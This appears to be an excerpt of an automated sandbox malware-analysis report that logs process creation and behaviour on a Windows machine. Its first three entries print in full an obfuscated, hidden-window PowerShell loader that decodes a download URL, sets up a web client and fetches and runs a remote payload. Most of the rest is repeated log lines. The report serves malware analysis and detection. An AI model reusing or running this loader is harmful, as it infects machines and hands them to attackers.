              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIn
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPaJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronInJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C1930F05 push eax; retf 3_2_00007FF7C1930F13
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00C4E3B0 push eax; retf 12_2_00C4E3B1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_06E30638 push eax; mov dword ptr [esp], ecx12_2_06E30AC4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_06E30AAC push eax; mov dword ptr [esp], ecx12_2_06E30AC4
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
